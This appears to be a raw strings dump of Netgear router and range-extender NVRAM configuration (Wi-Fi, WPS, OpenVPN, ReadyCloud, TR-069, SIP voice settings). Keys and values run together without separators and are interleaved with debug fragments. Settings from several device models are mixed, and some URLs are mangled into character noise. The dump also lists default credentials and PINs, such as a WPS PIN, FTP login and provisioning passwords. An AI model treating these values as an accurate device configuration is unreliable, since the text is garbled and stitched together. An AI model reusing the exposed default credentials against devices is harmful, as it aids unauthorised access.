0atmf5diagnostics5_state=Noneatmf5diagnostics0_state=Noneatmf5_NOrepetitions=2wan0_isbridge=0wla_temp_settingnvram_get_buf:=0usb_info_dev61nvram_get_buf:=0.0.0.0qos_bw_max_0nvram_get_buf:=5wan0_mtu=1500atmf5diagnostics1_state=Nonetruenvram_get_buf:=0cpe_model_name=DGN2200Matmf5_timeout=10wla_keyBitnvram_get_buf:=0atmf5diagnostics2_state=Nonemedia_server_scan_time=60tm_mail_freq=monthlyalarm_type=Noneiptv_br_wlan1_5g=0wifi_dot11_iso13=0wifi_dot11_iso12=0miiicasa_domainname=yun.netgear.cnled_enable=1hsdpa_apn=3gnetmacblock_enable=0miiicasa_brand=NETGEARmiiicasa_wanport=80old_miiicasa_wanport=80tm_mail_type=0block_state=1wifi_dot11_iso14=0miiicasa_model=R6220-PRalarm_enable=0miii_timeout=300wifi_super_wifi_enable1=0wifi_disable_edcca=1ip6_custom_6to4router=0wmm_enable_24G=1apple_timemachine_on=0apple_ip_addr=0.0.0.0vlan_enable=0fb_enable=0dod_disable=0apply_in_schedule=0intranet_ifname_org=eth3openvpn_enable=0apply_in_wireless=0log_usb=1wps_pin_enable=1ipv6_feature_off=1ip6_mode=disablelog_3g=1ip6_lan_mode=0RADIUS_Server=0vlan_tag_group=1:1:Internet:10:0:111111111:2:Intranet:11:0:11111111intranet_ifname=eth3ip6_ifid_enable=0wan_l2_ifname=eth3wmm_enable_5G=1E2pAccessMode=2wifi_btn_on=1fb_url_ext=/fbwifi/forwardlog_vpn=1wan_l2_ifname_org=eth3openvpn_port=12974wps_pin_max_failed_cnt=3fb_guest_only=1openvpn_type=0wps_pin_auto_lockdown=1fb_port=5001wifi_powerpercent1=100wifi_powerpercent=100wifi_def_key11=1enable_app_system=1fasttrack_priority=50%wwan_cid=0wwan_dodo_dns1=202.136.43.197dpsta_lan_uif=0telnet_on=0foked-daapd_running=0wwan_wan_tmp_type=2max_upload_speed=10wwan_usbtype=0openvpn_tun_ipaddr=192.168.254.1wwan_debug=0acs_no_restrict_align=0openvpn_protocol_tun=udpwwan_failover_ping_ip=0.0.0.0down_save_path=U:\downloader_enabled=0wwan_error_restart=0wps_fasttrack_button_status=0wwan_max_detect_time=120bridge_http_hijack=1wwan_failover_host_name=6b0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3&6W2N6r3N6W2j5i4u0Q4x3X3g2U0L8$3@1`.wwan_wan_type=1guest_manage_show=0port_assign_method=autosku_lang=Englisharp_enable=disablewwan_pin2_enable=0voice_mail_waiting=0wireless_restart=1gbsd_threshold=-80fasttrack_macaddr=00:00:00:00:00:00wla_tpc_mode=1wwan_wan_name=ADSLdebug_capture_lan_wan_packets=0wwan_transition=1wwan_mode=HSDPAdpsta_policy=0gbsd_open_timeout=13qos_fasttrack_enable=0wlg_tpc_mode=1gbsd_n_diff=3max_concurrent_tasks=5wan0_ifname=eth0enable_smart_mesh=0wwan_lock_enable=0openvpn_service_port_tun=12973wwan_mtu=1492downloader_choose_type=1wwan_isp_setting=0wwan_failover_index=0openvpn_tun_netmask=255.255.255.0wwan_auto_conn=1wan1_hwaddr1=00:FF:FF:FF:FF:FFwwan_dodo_dns2=202.136.42.229wwan_failover_count=3wwan_max_dns_error=5wwan_dhcp_enable=0wan1_hwaddr_sel=0wwan_3g_on_always=1pre_lan_ipaddr=10.10.10.254usb_mount=1max_download_speed=0wwan_failover_retry_interval=30wwan_soft_reset=0dsl_enable=0usb_wan_http_protect_enable=1wwan_attach_waiting_time=0debug_httpd_log=1enable_extender_mode=0wwan_pdp_type=0wwan_dsl_enable=0wwan_3g_only=0guest_manage_name=guestquick_qos_rule=0quick_qos_mode=0wwan_puk2_enable=0quick_qos_service_normal=block_ser_setup_ftp@qos_apps_smtp@qos_apps_www@qos_apps_dns@qos_apps_icmpntp_is_synced:=0enable_guest_manage=0gbsd_5g_rssi_threshold=-70usb_wan_ftp_protect_enable=1wwan_puk_enable=0wwan_max_soft_reset=5usb_detect=0quick_qos_service_highest=qos_ipphone@qos_skype@qos_eva@qos_vonage@qos_googlevoice_sender_id=44601l2tp_passthrough=1wwan_reconn=1wwan_usb_detect=0fw_email_send_download_result=0wwan_usb_reset=0quick_qos_service_low=qos_apps_emule@qos_apps_kazaa@qos_apps_gnutella@qos_apps_btdownload_auto_refresh=0bs_temp_rules_number=0download_refresh_rate=3wwan_lock_ntwk=0pptp_passthrough=1wwan_failover_enable_hw_detect=1wps_pbc_apsta=enabledbt_location_type=0down_file_exist=0wan_hwaddr2=00:FF:FF:FF:FF:FFvoice_sender_id2=44614wwan_country_setting=0pre_lan_netmask=255.255.255.0wwan_auto_roaming=1wwan_ppp_max_unsuccess=10gbsd_wait_5g_rssi_timeout=7ipsec_passthrough=1wwan_conn_manual=0wwan_password=guestwwan_dbgLvl=1wwan_failover_hw_time=30no_hsdpa=1wwan_failover_resume=30wwan_user_name=guestusb_feature=0wwan_ppp_unsuccess=0debug_httpd_auto_bring_up=0ver_check_ftp_svr1nvram_get_buf:=5vpn_update=1nvram_get_buf:=0.0.0.0wps_unconfig_addenr=1lan2_ifnamesnvram_get_buf:=5wps_randomkey=abCI7zpcDbQ1GJ93rnO1B6SOHVToVU7oJzN6TTPSoef6je099zkHgB3wan_bpa_minheartbeatnvram_get_buf:=0ParentalControlnvram_get_buf:=255.255.255.0falsepppoe_ifname=ppp0nvram_get_bufwps_device_pin=12345670wps_mixedmode=2fw_email_email_smtpnvram_get_buf:=5wla_key3nvram_get_buf:=5syslog_optionnvram_get_buf:=5pppoe2_schedule_confignvram_match:=true127:0:0:23:59wps_pin_disable=0wlan_acl_mac44nvram_get_buf:=255.255.255.0usb_info_dev91nvram_get_buf:=0.0.0.0wps_randomssid=NTGR_jTPcSNByEaA94akslRRusb_info_dev50nvram_get_buf:=5wps_autoenr=1wifi_mumimo=0wan_wanAcType4=DSLwifi_implicit_txbf1=1rt_rip_version3=0log_inet_auto_reset=1wifi_implicit_txbf=1rt_rip_version7=0log_wlan_sche_onoff=1default_wan=1wan_wanAcType6=DSLwan_wanAcType7=DSLwifi_aggregate_frames1=64tags=,,,wifi_ldpc1=1apcli_wan_dns_mode=dynamicenable_wizard_log=0wifi_txbf1=1wifi_sgi1=1wan_wanAcType8=DSLdbg_storage_location=0vlan_bridge_enable=0autoupg_fileinfo_in_nv=fileinfo.txtwifi_aggregate=1wan_wanAcType2=Ethernetvlan_untag_group=1:0:Bridge:0:0:00000000rt_rip_version5=0ftp_server_pwd_enable=0wifi_mumimo1=0wifi_sgi=1wan_vlan_id=10ftp_server_wan_pwd_enable=1openvpn_tun_port=12973openvpn_tap_port=12974wan_wanAcType5=DSLwifi_airtimefairness=0enable_recovery=0http_server_wan_pwd_enable=1wifi_aggregate1=1rt_rip_version2=0wan_preference=ethwifi_tx_stbc=1wifi_txbf=1openvpn_tap_protocol=udplan_bridge_enable=0wifi_ldpc=1openvpn_tun_protocol=udpapcli_wan_mode=dhcpwan_wanAcType3=DSLwan_vlan_enable=0rt_rip_version4=0http_server_pwd_enable=0wifi_aggregate_frames=64smb_server_pwd_enable=0ip6_custom_6rd=1rt_rip_version6=0led_ctrl_opt=blinkwan_enable=1rt_rip_version8=0wan_traffic_type=atmwifi_airtimefairness1=0wifi_tx_stbc1=1wifi_schedule_on1=0readycloud_need_persist=1PMFMFPR=0boost_mode=autorcagent_log_to_file=1CalCacheApply=0readycloud_hook_url=https://readycloud.netgear.com/device/hookIcapMode=0DfsZeroWait=0readycloud_upload_url=https://readycloud.netgear.com/directioremote_path=/opt/remoteDfsZeroWaitCacTime=255PMFMFPC=0rcagent_path=/opt/rcagentDfsEnable=0PERCENTAGEenable=0VOW_Airtime_Fairness_En=1readycloud_use_lantry=1genie_remote_need_persist=1readydrop_path=/opt/readydropPMFSHA256=0CP_SUPPORT=2rcagent_log_to_console=0readycloud_fetch_url=https://readycloud.netgear.com/device/entryEthConvertMode=donglereadycloud_control_path=/opt/rcagent/scriptsBFBACKOFFenable=0RED_Enable=1SKUenable=0genie_soap_port=80G_BAND_256QAM=1leafp2p_path=/opt/leafp2pleafp2p_peer_route_type=1wan_wanAcType=EthernetMACRepeaterOuiMode=2readycloud_actiontype=0wl_acs_fcs_mode=0wl_intfer_tcptxfail=5lang_check_https_svr=http.fw.updates1.netgear.comsmtp_port=25wl1_rxchain=7sem_getnvram_get_buf:=nvram_get_buf: Key: 411000f7falsenvram_get_buf: dhcpnvram_setnvram_get_buf:=:wl_pspretend_retry_limit=0wl_acs_tx_idle_cnt=5cur_access_ip_type=4wl_acs_ci_scan_timer=4wl_txbf_bfr_cap=0acs_2g_ch_no_restrict=1wl_acs_scan_entry_expire=3600wl_acs_dfsr_deferred=604800 5nvram_get_bufwl0_wps_config_state:=0ipv6_proto (:wl_acs_dfs=0ver_check_https_svr1=http.fw.updates1.netgear.comwl_dwds=0wl_dcs_csa_unicast=0ver_check_http_svr1=http.fw.updates1.netgear.comwl1_txchain=7wl0_rxchain=3wl_intfer_period=1wla_wps_tmp_lock_flag=0wl1_nar=0nvram_get_bufnvram_get_bufnvram_get_bufsem_getnvram_get_buf:=wlg_wlanstate: Key: 411000f7dhcpwl_acs_dfsr_immediate=300 3wl_nar=0nvram_get_bufnvram_get_buf=nvram_get_bufwl0_wps_config_state: Unable to open key: 0wl_acs_cs_scan_timer=900wl_acs_ci_scan_timeout=300active_fbwifi=0wl_txbf_bfe_cap=0wl0_nar=0wl_intfer_txfail=16wl_acs_chan_dwell_time=70cmd=159: No such devicewl0_txchain=3falsenvram_get_buf:=0region_num=0xFFFFqos_bw_tmp_downlink=0wl_acs_chan_flop_period=30wl_pspretend_threshold=0wl_acs_dfsr_activity=30 10240nvram_matchnvram_get_bufnvram_get_buf:=nvram_get_buf: wla_wlanstatesku_namecur_access_user_ip=192.168.1.2qos_bw_downlink=512000txworkq=1mtd9_lang_version=nvram_get_buf: http_rmenablewl_intfer_cnt=3false:=0mydetc_wan_lan_conflict=0log_filternvram_get_buf:=enabledhttps_upgrade_proto=httpsupnp_turn_onnvram_get_buf:=nvram_matchnvram_get_bufRAE_readyshareParameter=1440RAE_connectedDeviceParameter=1440RAE_PolicyVersion=V0.01tc_ra_enable_2=NoRAE_routerConfigParameter=1440RAE_memThresholdHigh=90RAE_reportMethod=IoTtc_new_purchase=0RAE_wifiParameter=360aws_iot_mqtt_client_id=R6800RAE_routerInfoParameter=1440tivo_disable=0RAE_dailyUpdateMethod=1RAE_cpuThresholdHigh=90tc_auto_update_enable_2=NoRAE_updaterInternal=360opmode=routerRAE_memThresholdDuration=60RAE_trafficMeter=1440use_openvpn_mtd_file=0old_opmode=routeraws_iot_root_ca_filename=root-CA.crtRAE_stage=betaRAE_cpuThresholdDuration=60RAE_mediadeviceParameter=14406c_wan_down_killgw=1fbwifi_gwid=0enable_ap_modenvram_get_buf:=0qos_bw_uplink_ookla=0debug_hidden_page_in_process=0wlh_temp_channel=36WifiSchedule_5G_2_RadioDown=0wlh_wlanstate=Enableipv6ready_ce=1wlh_ssid=NETGEAR-5G-2ipv6_support_solmaxrt=1wlh_temp_band=5Gwl2_txbf_bfr_cap=1wl2_assoc_retry_max=20wlh_wds_ptp_sta=1qos_bw_downlink_manual=0wlh_defaKey_2=0ra_reboot_flags=1wlh_wep_length=0dual_5g_band=1check_fw_end_time=Sun Jan 4 03:42:00 2015circle_reset_default=1restart_httpd=0wlh_temp_mode=300Mbpswl2_wps_config_state=0wlh_ap_isolate=0wlh_ssid_bc_2=1ipv6_forward_by_ipgw=1circle_download_server=http://http.updates1.netgear.com/sw-apps/parental-control/circle/r7000p/wlh_band=2.4Gtmp_wlh_repeater=0wlh_wep_length_2=0auto_update_enable=0led_gpio_status=0RA_region_check=0AWS_JSON_DBGP=0RA_install_config=0wlh_wpa_gtk_rekey=3600wlh_wds_pmp_sta=1wlh_rts=2347router_TC_enable=0circle_start_once=0openvpncrt_sha256=0wlh_secu_type=Nonewlh_defaKey=0wlh_allow_access_2=0wlh_temp_secu_type=Nonebroadstream_iqos_enable=0wlh_broadcast=ssid_5G_bccheck_fw_start_time=Thu Jan 1 00:00:10 2015wlh_mode=HT80fbwifi_config=0wlh_temp_defaKey=0wlh_en_secu_type=WPA-AUTOwl2_radarthrs=1 0x6ac 0x6dc 0x6bc 0x6ec 0x6ac 0x6dc 0x6bc 0x6ecwlh_wds_enable=0gbsd_wait_rssi_intf_idx=1send_JSON_period=300RA_enable=0acs_2g_ch_excl=1 11wl2_stbc_tx=autowl2_txbf_bfe_cap=1enable_fbwifi=0qos_bw_uplink_manual=0tmp_wlh_wds_enable=0wlh_secu_type_2=Nonepasswordrecovered_debug:=0wlh_temp_broadcast=ssid_5G_bcenable_circle_control=0wlh_channel=136qos_manual=0ipv6ready_code5_rule=1wlh_temp_ssid=NETGEAR-5G-2wlh_auth_type=automaticipv6spi_off=0wlh_onoff=Disablewlh_wds_mode=1wlh_frag=2346RA_useroption_report=0wl_wme_5g_2=1blank_download_readyshare=1qos_bw_downlink_ookla=0wlh_auth_type_2=automaticblank_download_desktop=1wlh_sec_profile_enable_2=0wl_5g_bandsteering=0wlh_txbf=1wlh_wmm_advert_2=1wlh_radius_ip=0.0.0.0wlh_repeater=0wlh_allow_see_access_2=0wl2_stbc_rx=1wlh_preamble=longipv6ready_ce_wide6c=1wl2_ifname=eth3wlh_radius_port=1812wl0_ifname=ra0wlh_ssid_2=NETGEAR-5G-2-Guestver_check_ftp_path=sw-apps/router-analyticscircle_download_server1=https://http.fw.updates1.netgear.com/sw-apps/parental-control/circle/r6400v2/reset_product_name=0dap_bind_anyaddr=0dap_disable=0RA_stage=proddy_ed_thresh=1et_reboot_times=0video_qos_debug=0genie_admin_password=0dap_init_check_delay=300http_rmenable:=...ra_test_init_report_time=0weather_band_enable=1dap_wait=6wla_temp_ap_isolate=0wl_channel=0pppoe_ip_sel=0wl_nbw_cap=2wl_nctrlsb=nonewan_proto:=0lan_wps_reg=enabledwla_temp_temp_broadcast=ssid_bcpppoe_user_ip=...enable_sta_modenvram_get_buf:=0enable_sta_mode:=255.255.255.0lanip_changed:=dhcppktc_enable=1wps_aplockdownnvram_get_buf:=192.168.1.1wl1_obss_coex=0wl1_gmode=GMODE_AUTOwl0_mcast_regen_bss_enable=1wl1_gmode_protection=autoqos_netflix_rule_count=0RA_AdvValidLifetime_from_IAPD=2400qos_netflix_rule_index=0traffic_warning_state:=10.0.0.138RA_AdvPreferredLifetime_from_IAPD=1800wl0_gmode=1wl1_mcast_regen_bss_enable=1wl0_gmode_protection=auto_mcast_regen_bss_enable=1wsc_pin_disable:=1ping_pass=1wl0_wps_config_statenvram_get_buf:=192.168.1.1true:=0lacp_gui_debug=0lacp_multigroup=0wl1_vht_features=4portTrunkingMode=dynamiclacp=1lacpmode=1fast_restart=1wl2_vht_features=40:deadman_to=5000000ipv6_lan_length=641:deadman_to=5000000lacpdev=vlan12:deadman_to=5000000lacpdebug=0ipv6_wan_length=64tri_band_hw_ver=R8500wl0_vht_features=7dual_band_hw_ver=R7800lacpports=1 2lan1_ifname=br1telnetd_enable:=eth0pptp_user_ipnvram_set:=0wl2_wps_mode=disabledwsc_pin_disablenvram_get_buf:=sem_get: Key: 5 (0) ?20nvram_get_bufntp_is_synced=sem_get max_concurrent_tasks: wl2_ifnamewl0_wps_config_state:=[Bonjour] Can not open "/proc/printer_statuswl1_wps_mode=enabledwlg_preset_passphrase=sem_get: Waiting for semaphore timeout (Key: 411000c0, Semaphore: 8001)...enable_mu_mimo=0gbsd_rssi_timeout=30SC_ACCT_1_SIP_SESSION_TIMER=1800SC_SYS_CFG_MAX_CALL_PER_ACCT=2SC_ACCT_1_MEDIA_4TH_CODEC=3TR_DRMD_ENABLE=0use_mark=0SYSLOGD_DISPLAY_LEVEL=7SC_ACCT_1_SIP_PASSWORD=1000M2UEnabled=0LAN_PREFIX6_L=1SC_ACCT_1_MEDIA_1ST_CODEC=1SC_LINE_1_LEC=3wlg_obss_coex=0SC_LINE_1_CALLER_ID_PWR=0WAN_GRE_TLAYER=0TR_DL_CFG_TYPE=1wlg_temp_auth_type=automaticwl_rpt_wlanstate2=DisableAccessPolicy5=0TR_SESSION_MAX_RPC=3000SC_ACCT_1_ADV_HOTLINE_TARGET=8888SC_ACCT_1_SIP_SESSION_MIN_EXP=90SC_SYS_SIP_PRIORITY_NON_URGENT_NUMS=6000,7000SC_ACCT_1_SIP_SEP_REG_ADDR=0.0.0.0SC_FTR_2ND_HF_AND_DIGIT=1,*1#,*2#SC_FTR_CONF_DELETE_STR=#41#SC_ACCT_1_MEDIA_RTP_DETECT=0SC_FTR_UNATTENDED_TRANSFER_STR=*6TR_DL_WEB_SCRIPT=/sbin/tr_cert_update.shTR_CR_QOP=authTR_DL_FW=0ap_mode_cur=2DM_POLLING_REPTION=-1SC_ACCT_1_SIP_INFO_ENABLE=0WAN_GATEWAY=0.0.0.0DM_INTERVAL=3600SC_ACCT_1_ADV_ALL_CF=0SC_ACCT_1_MEDIA_9TH_CODEC=3SC_SYS_FEATURE_DVCC_ACTION=1DM_BA_SKEY=badrmdMGMT_SSH_WAN=1DM_ACC_AUTH_PREF=MD5wla_temp_auth_type=automaticSC_SYS_VOICE_JB_LEN=120SC_ACCT_1_SIP_AUTHNAME=1000TR_SN_TYPE=0SC_MEDIA_CODEC_G726_16_PT=96SC_FTR_RELEASE_AND_ACCEPT_STR=*1#slic_int=10SYSLOGD_REMOTE_PORT=514SC_FTR_5TH_HF_AND_DIGIT=4,*7#WscAutoSetupLockEnable=1SC_ACCT_1_ADV_HOTLINE=0SC_ACCT_1_ADV_CALL_WAITING=0DM_CLIENT_AUTH=MD5TR_DEBUG=0VHT_LDPC=1SC_ACCT_1_ADV_HOLD_TYPE=2DM_FUMO_PAUSE_TIME=30rootap_linkratenvram_get_buf:=0.0.0.0SC_SYS_AUTO_RECONNECT=1SC_ACCT_1_SIP_OUTBOUND_ADDR=0.0.0.0TR_OUI=000CE7AccessPolicy4=0SC_ACCT_1_NAT_SRV_ADDR=0.0.0.0DM_DRMD_ENABLE=0ap_mode=1TR_BOOTSTRAP=1DM_ACC_CLT_NODENAME=clientAuthSC_ACCT_1_TIMER_RINGING=180WscModelName=EX6120SC_ACCT_1_ADV_DND=0DM_IN_REPLACE=0SC_ACCT_1_SIP_SEP_REG_PORT=5060product_description=AC1200 Wifi Range Extender EX6120router_link_led=0WscModelNumber=EX6120DM_DRMD_DURATION=5SC_EMERG_TIMER_WMX_CONNECT=60SC_SF_IS_ENCRYPT=0psr_mac_prefix=00:0f:b5:00:00:00SC_ACCT_1_SIP_PRI_OTHER=UrgencyUsePrioritySC_ACCT_1_SIP_MWI=0SC_ACCT_1_SIP_P2P_CALL=0SC_FTR_TRIGGER_BY=0SC_ACCT_1_ADV_RINGING_TIMEOUT_RESP_CODE=408TR_M_UL_QUEUE=2MGMT_AUTOREBOOT_TIME=0success_url=http://675K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3&6W2N6r3N6W2j5i4u0Q4x3X3g2U0L8$3@1`./success/ex3700-en.aspxwl_same_sec=0SC_ACCT_1_SIP_PRI_REG_PORT=5060WAN_PPP_CIPHER=0wire_mode=0SC_LINE_1_CALLER_ID_DISP=1USBHOST_MAC=00:00:00:00:00:00sta_list1=0DM_MODEL=WiMAX_EVBSC_ACCT_1_SIP_LOCAL_PORT=5060wl_rpt_broadcast1=EnableSC_ACCT_1_ADV_CFNA=0SC_ACCT_1_SIP_DOMAIN=wimaxSC_ACCT_1_SIP_SEC_PROXY_ADDR=0.0.0.0DM_BOOTSTRAP_SML_ENC=WBXMLSC_MEDIA_CODEC_SINGLE_CODEC=1SC_AUTO_PROV_FTP_RETRY=3SC_SF_CS_DST_IP=1DM_NODENAME=MTKMACRepeaterEn=0eth_bind_band=5GSC_LINE_1_VAD=0MGMT_AUTOREBOOT_ENABLE=0link_status2=0DM_APPADDR_NODENAME=MTKAddrDM_ENABLE=0need_set_region=1SC_ACCT_1_MEDIA_8TH_CODEC=3DM_SMS_SERVICE=10654040wl1_hwaddr=00:00:00:00:64:D2SC_ACCT_1_STATS_MO_ANSED=0PhysWanIfList=ccmni0,ccmni1,ccmni2,lte0TR_ENABLE=0psr_alias_oui_3=02:18:4D:00:00:00WAN_PPP_STATUS=DisconnectedWAN_BRIDGING_LAN_ARP=0SC_ACCT_1_MEDIA_2ND_CODEC=8SC_FTR_HOLD_AND_ACCEPT_STR=*3#DM_BOOTSTRAP_UDP=0WAN_PPP_DNSOVERWRITE=0TR_IGNORE_FAULT_TYPE=0SC_SF_CS_SRC_PORT=1AccessPolicy9=0wps_friendly_name=EX6120rc_wait_seconds=0TR_UL_STATUS=0WAN_PPP_AUTH=15SC_MEDIA_CODEC_ILBC_PTIME=30AccessPolicy12=0DM_FUMO_UNCOMPLETE=0WscV2Support=1LAN_MASK=255.255.255.0pcm_ver=6TR_DRMD_REPETION=1sta_band=bothSC_FTR_RELEASE_HOLD_STR=*8#HW_VER=MTKwps_success_mode_2=0wl_rpt_broadcast2=EnableTR_SOAP_FAULT_HTTP=0LAN_IP6=fc00::1SC_LINE_1_VOGAIN_TX_LV=0SC_ACCT_1_ADV_CALL_CONF=2wps_model_number=EX6120SC_FTR_1ST_HF_AND_DIGIT=0,*9#,*8#SC_ACCT_1_ADV_CFB_TARGET=0000TR_LOG=0upnp_model_description=AC1200 Wifi Range Extender EX6120DM_APPADDR_SVR_PORT_NODENAME=MTKPortclient_link_led=0SC_PRV_SDP_RESTORE_ATTR=silenceSupp,silencesupp,ecan,X-fax,x-fax,fax,X-modem,x-modem,modemSC_ACCT_1_ADV_DTMF_TYPE=0SYSLOGD_REMOTE_ENABLE=0ETC_PATH=/mntsoc_id=MT762xSC_ACCT_1_SIP_MWI_INTERVAL=86400SC_SF_PHS_ENABLED=0SC_ACCT_1_STATS_MO_FAILED=0SC_MEDIA_CODEC_G711_PTIME=20SC_ACCT_1_STATS_MT_RECVED=0dhcpc_get_ip=0wlg_sche_wlanstate=EnableSC_ACCT_1_MEDIA_3RD_CODEC=9lan_dns=0.0.0.0SC_EMERG_REGISTRATION=1SC_ACCT_1_TIMER_HANG_RMD_1=15SC_ACCT_1_STATS_MT_ANSED=0AccessPolicy8=0TR_INFORM_ENABLE=1ap_band=2.4GSC_SF_HARQ_ENABLED=0psr_alias_oui_2=02:14:6C:00:00:00SC_ACCT_1_SD_ENABLE=0SC_PRV_WMX_MS_INIT_SF=0FixedTxMode=3WAN_IP=0.0.0.0DM_MF=MediaTekTR_MF=MediaTekap_support_mode=2WscMaxPinAttack=3TR_SESSION_RETRY_COUNT=0SC_LINE_1_TYPEII_CALLER_ID_ENABLE=1SC_ACCT_1_SIP_REG_EXPIRY=900DfsSwDisable=0SC_FTR_3RD_HF_AND_DIGIT=2,*3#,*4#WAN_PPP_TRIGGER=2WAN_MASK=0.0.0.0DM_BA_NODENAME=clear_diagnosticsTR_SESSION_MAX_RPC_CMD=/etc/init.d/cwmpd restartTR_CR_PORT=60000wla_obss_coex=1SC_EMERG_NUM_FIRE=119,911psr_alias_oui_4=02:1B:2F:00:00:00WAN_PPP_IDLETIME=0DM_WAIT_DOWNLOAD=0AccessPolicy15=0SC_SYS_APPLY_OUTBOUND_FROM_DHCP=0DM_BA_SERVER_URL=http://diagnostics.clear.com/drmd/SyncMLSC_FTR_CONF_CREATE_STR=*41#SC_ACCT_1_SIP_SEC_OUTBOUND_PORT=5060SC_SF_SCHED_TYPE=5DM_ACCSVR_ID=MTK_SVRSC_SYS_SIP_SUPPORTED=100rel, timerApCliDefaultKeyID=1MGMT_TELNET_LAN=1WAN_MAC=00:00:00:00:00:00SC_ACCT_1_SIP_USERNAME=1000EtherTrafficBand=1login_remember_enable=disableSC_MEDIA_PORT_START=40000SC_SYS_SIP_TRANSPORT_TYPE=0wla_sche_wan_state=EnableSC_ACCT_1_FAX_TYPE=0TR_CFG_KEY_NUM=5SC_ACCT_1_SIP_SEC_SEP_REG_ADDR=0.0.0.0SC_ACCT_1_SIP_SESSION_REFRESHER=0TR_DL_FW_TYPE=0SC_ACCT_1_MEDIA_6TH_CODEC=3SC_ACCT_1_SIP_SEC_REG_ADDR=0.0.0.0DM_BA_CLIENT_AUTH=HMACSC_LINE_1_FLASH_DETECT_UP_LV=700SC_AUTO_PROV_FTP_FILE_NAME=cpe${mac}mt71x9.cfgSC_ACCT_1_SIP_PRI_DOMAIN=wimaxEDCCA_BLOCK_CHECK_TH=2rootap_assoc=0DM_STUNNEL_PORT=65000LAN_PREFIX6=fc00::/64SC_ACCT_1_SIP_SESSION_FLAG=0EDCCA_AP_STA_TH=255os_name=linuxSC_SYS_CFG_MAX_LINE=4SYSLOGD_REMOTE_HOST=192.168.0.100DM_IN_SELF_REGISTER=0WSC_UUID_E1=e11e1cf9973a87ff3360e5f1777a2b1fSC_FTR_HOLD_AND_RETRIEVE_STR=*4#WAN_PPP_IPver=4voip_ch_num=1MGMT_WEB_WAN=1WscSerialNumber=0000001SC_FAX_REINVITE_ONLY_FROM_RECEIVER=1ApCliKey3Type=0SC_SF_MAX_LATENCY=50TR_INFORM_BASETIME=0SC_MEDIA_PORT_END=50000TR_DRMD_DURATION=0SC_SF_GRANT_INTRV=20SC_FTR_HF_BG_SESS_HIGH_PRI=wSC_PRV_RTP_IGNORE_MARKER_BIT=1BusyIdleRatio=1SC_PRV_SIP_MAX_REG_RETRY=5SC_ACCT_1_SIP_REG_PORT=5060wl_psr_mrpt=1rpt_default_state=1SC_SYS_SIP_PRIORITY_NORMAL_NUMS=4000,5000SC_ACCT_1_SIP_PRI_SEP_REG_ADDR=0.0.0.0SC_ACCT_1_ADV_CALL_WAITING_RESP_CODE=180TR_BOOLEAN_TYPE=0AccessPolicy11=0SC_ACCT_1_MEDIA_RTP_DETECT_INTERVAL=40WscManufacturer=NETGEAR, Inc.IgmpSnEnable=0SC_ACCT_1_SIP_SEC_DOMAIN=wimaxAccessPolicy13=0SC_ACCT_1_NAT_SRV_PORT=3478WAN_PPP_MAXCONNECTTIME=0SC_AUTO_PROV_FTP_LOGIN_NAME=userSC_ACCT_1_ADV_HOTLINE_TIMER=6WAN_PPP_MPPESTATEFUL=0DM_DD_DOWNLOAD=1AccessPolicy7=0DM_UNCOMPLETE=0SC_ACCT_1_SIP_PROXY_ADDR=0.0.0.0SC_SF_CS_QOS=120000change_ether_port=0nat_mode=0TR_CA_PASSWD=wimaxSC_LINE_1_TONE_TYPE=0SC_SYS_MAGIC_NUM=190915dhcp2_ser_status=enableSC_ACCT_1_ADV_REJ_MT_CALL_RESP_CODE=486SC_FTR_ATTENDED_TRANSFER_STR=*7#DM_SERVER_AUTH=MD5SC_MEDIA_CODEC_G723_PTIME=30SC_ACCT_1_ADV_CFB=0DM_STUNNEL_TEST=0SC_SYS_VOICE_JB_TYPE=1ap_band_cur=2.4GSC_SYS_SPEED_UP_DIALING_STR=#DM_ACCNAME=MTK_SVRSC_PRV_SDP_RM_REJ_ATTRS=1SC_SYS_SIP_T1_INTERVAL=500SC_EMERG_ENABLE=1device_id=EX6120SC_FTR_HOLD_STR=*52#AutoChannelSkipList=12;13;14wps_model_description=AC1200 Wifi Range Extender EX6120TR_DEVSUM=InternetGatewayDevice:1.0[](Baseline:1)SC_MEDIA_CODEC_G729_PTIME=20SC_ACCT_1_SIP_SEC_SEP_REG_PORT=5060SC_LINE_1_REVERSE_TIPRING=0SC_FTR_AUTO_RETRV_DIAL_TIMEOUT=1TR_DL_STATUS=0SC_ACCT_1_STATS_MO_ATTEMPT=0link_status=0DM_DRMD_REPETION=0SC_ACCT_1_SIP_PROXY_PORT=5060SC_SYS_RTCP_SEND_INTERVAL=15SC_ACCT_1_MEDIA_G723_RATE=0HT_LDPC=1ApCliAuthMode=OPENSC_ACCT_1_SIP_MWI_EVENT=message-summaryUSB_COMPOSITE=3SC_AUTO_PROV_ENABLE=0SC_LINE_1_CALLER_ID_TYPE=4EDCCA_AP_AP_TH=255RadioOff=0wla_no_cli_mix_mode=0SC_FAX_PASSTHRU_LEC_ON=1SC_FTR_CUSTOMER_TYPE=255DM_OEM=MediaTek_OEMTR_ACT_REBOOT_TYPE=0WAN_OP_MODE=2ApCliEncrypType=NONEDM_PROVISION_LOCK=0DM_DRMD_SRV_CONFIG=OMASC_MEDIA_CODEC_TELEVT_PT=101SC_ACCT_1_TIMER_HANG_RMD_2=15SC_FAX_T38_LEC_ON=1DM_BA_SERVER_NONCE=12345TR_UL_URL_TYPE=0SC_MEDIA_CODEC_G726_40_PT=99SC_SF_CS_SRC_IP=1SC_LINE_1_REGION=0rootap_linkrate=0SC_LINE_1_RING_IMPEDENCE=1DM_BA_ACCSVR_ID=Badrmdwithout_hw_switch_ap=1SC_EMERG_NUM_MEDICAL=120,911DM_BA_ACC_AUTH_PREF=HMACSC_SYS_SIP_PRIORITY_URGENT_NUMS=1000,2000,3000TR_CR_PATH=/cwmp/crSC_SYS_CFG_MAX_CALL=6SC_EMERG_NUM_POLICE=112,119,911SYSLOGD_ENABLE=1SC_ACCT_1_SIP_SEC_REG_PORT=5060SC_ACCT_1_ADV_CFU_TARGET=0000SC_EMERG_NUM_GENERIC=112,911,119,110,120WAN_IP_REQUEST_TIMEOUT=120DM_NORMAL_SML_ENC=XMLpsr_alias_oui_1=02:09:5B:00:00:00SC_AUTO_PROV_FTP_LOGIN_PASSWD=passwdstop_conflict_hijack=0SC_ACCT_1_MEDIA_5TH_CODEC=3WAN_PPP_USER:=EnglishSC_PRV_SIP_SE_FORCE_ENABLE=0rootap_linkrate2=0SC_ACCT_1_TIMER_FIRST_DIGIT=15SC_ACCT_1_SIP_SESSION_METHO